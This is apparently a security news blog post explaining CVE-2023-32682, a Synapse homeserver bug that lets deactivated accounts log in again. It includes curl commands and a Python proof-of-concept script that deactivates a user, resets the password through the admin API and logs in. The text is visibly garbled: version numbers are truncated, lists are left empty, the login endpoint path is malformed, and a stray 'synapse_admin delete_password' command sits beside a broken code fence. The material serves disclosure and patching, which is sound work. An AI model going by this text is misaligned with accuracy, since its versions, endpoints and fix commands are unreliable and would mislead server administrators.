CVE CyberSecurity Database News

CVE-2023-32682 - Synapse Matrix Homeserver Deactivated User Authentication Bypass Explained

Poster -

The Synapse homeserver—an open-source implementation of the Matrix protocol—is a popular software project that helps power real-time chat platforms like Element. Recently, a severe authentication bypass issue was discovered: CVE-2023-32682, where, in certain situations, a deactivated user could still log in.

In this post, we’ll break down what this vulnerability is, how it happens, who is affected, and what you can do to protect your server.

What Is CVE-2023-32682?

CVE-2023-32682 is a security bug found in Synapse versions _before_ 1.85.. Under uncommon Synapse configurations, a deactivated user (someone whose account should no longer be able to log in or use the server in any way) could bypass expected safeguards and sign in again.

This bug is not triggered under all authentication setups. You're only vulnerable if you allow logins via JWT (JSON Web Tokens) _or_ if you use the built-in password database _and_ manually set a password for a user after deactivating them.

Who Is At Risk?

You are vulnerable to this bug if at least one of the following is true:

An admin (or script) resets a user's password after they are deactivated.

> Good news:  
> If logins are only allowed via SSO (like SAML, CAS, or OIDC), or through _external password providers_ like LDAP, you are NOT affected.

How Does The Exploit Work?

When Synapse deactivates an account, it is supposed to prevent any future logins. However, due to a flaw in the logic, if you:

And execute a password set after deactivation,

the server can incorrectly allow logins for deactivated accounts.

Suppose an admin wants to remove a user and runs

curl -X POST -H "Authorization: Bearer <admin-access-token>" \
     -H "Content-Type: application/json" \
     -d '{"user_id": "@targetuser:yourdomain"}' \
     'https://yourserver/_synapse/admin/v2/deactivate';

Here’s the catch: An admin or automation sets their password _after_ this, via the admin API

curl -X POST -H "Authorization: Bearer <admin-access-token>" \
     -H "Content-Type: application/json" \
     -d '{"new_password": "H4ckedPa$$word!"}' \
     'https://yourserver/_synapse/admin/v1/reset_password/@targetuser:yourdomain';

Result:
Even though Synapse shows the user as ‘deactivated,’ they can now log in with "H4ckedPa$$word!".

If JWT is enabled, an attacker with a valid/unexpired JWT for the user can also log in despite deactivation.

Example (Python Code)

Here's a simple *Python* example using requests to show how the process could be abused if admin API credentials are leaked or misused:

import requests

HOST = "https://yourserver";
ADMIN_TOKEN = "YOUR_ADMIN_TOKEN"
USER_ID = "@user:yourdomain"

headers = {
    "Authorization": f"Bearer {ADMIN_TOKEN}",
    "Content-Type": "application/json",
}

# Step 1: Deactivate the user
deactivate_resp = requests.post(
    f"{HOST}/_synapse/admin/v2/deactivate",
    headers=headers,
    json={"user_id": USER_ID}
)
print("Deactivate:", deactivate_resp.json())

# Step 2: Set a new password after deactivation
reset_resp = requests.post(
    f"{HOST}/_synapse/admin/v1/reset_password/{USER_ID}",
    headers=headers,
    json={"new_password": "newpw123!"}
)
print("Reset Password:", reset_resp.json())

# The account is deactivated but password is set—user can login!
login_resp = requests.post(
    f"{HOST}/_matrix/client/r/login",
    json={"type": "m.login.password", "user": USER_ID, "password": "newpw123!"}
)
print("Login as deactivated user:", login_resp.json())

1. Upgrade to Synapse 1.85. or Later

The most effective fix is to upgrade!  
Download the latest version here:  
- Synapse Release 1.85. Changelog
- Synapse Upgrade Guide

If you don't use JWT for login, set jwt_config.enabled: false in homeserver.yaml.

- Avoid resetting passwords for deactivated users. If you must, ensure that the user is *reactivated* first, and then follow best practices.

synapse_admin delete_password --user-id @user:yourdomain

`

 Or use the API to set password to a strong random value only known by admins.

---

## Timeline & References

- Vulnerability discovered: May 2023
- Patched in: Synapse 1.85. (Changelog)
- Official advisory:  
 - matrix-org/synapse#15278
 - Matrix Security Disclosure
- Matrix Blog:  
 - Security Advisory: CVE-2023-32682

---

## Summary

- CVE-2023-32682 allows a deactivated user to log in under rare but dangerous circumstances in Synapse.
- It’s most critical if you use JWT authentication, or the built-in password DB and reset a password post-deactivation.
- Upgrade to Synapse v1.85. or newer right away.
- Review your user deactivation process and avoid resetting passwords of deactivated accounts.

Stay safe and keep your Matrix homeserver updated! If you found this post helpful, please share it with your fellow admins.

---

Timeline

Published on: 06/06/2023 19:15:00 UTC
Last modified on: 06/17/2023 03:15:00 UTC